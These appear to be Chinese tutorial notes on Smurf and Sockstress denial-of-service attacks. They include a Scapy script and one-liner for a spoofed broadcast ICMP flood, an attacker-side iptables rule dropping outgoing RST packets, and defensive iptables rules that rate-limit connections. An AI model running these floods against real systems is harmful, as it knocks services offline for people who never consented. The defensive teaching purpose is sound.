Smurf攻击

十分古老的DDoS攻击技术

    对现代操作系统几乎无效（大部分不响应目标为广播的ping）

    只在局域网里

    向广播地址发送ICMP echo Request（ping）包，伪造源地址，由于响应太多所以，造成伪造的地址拒绝服务

Scapy

     i=IP()

     i.src="1.1.1.2"

     i.dst="1.1.1.255"

     p=ICMP()

     r=send(i/p)

一行Scapy

send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)

Sockstress攻击

2008年由jack C.Louis发现

针对TCP服务的拒绝服务攻击

     消耗目标操作系统资源

     与目标建立大量socket链接

     攻击者消耗资源小（CPU，内存，带宽）

     异步攻击，单机可拒绝服务高配资源服务器，建立的链接都需要用资源的处理

     完成三次握手，最后的ACK包window大小为0（客户端不接收数据）

     Window窗口实现的TCP流控与可靠传输

添加防火墙规则

iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP

防御措施

直到今天sockstress攻击仍然是一种很有效的DoS攻击方式

由于建立完整的TCP三步握手，因此使用syn cookie防御无效

根本的防御方式是采取白名单（不实际）

折中对策：限制单位时间内每IP建TCP连接数

封杀每30秒与80端口建立的链接超过10的地址

   iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
   iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --
seconds 30 --hitcount 10 -j DROP

只对单个ip有效，但是对DDoS无效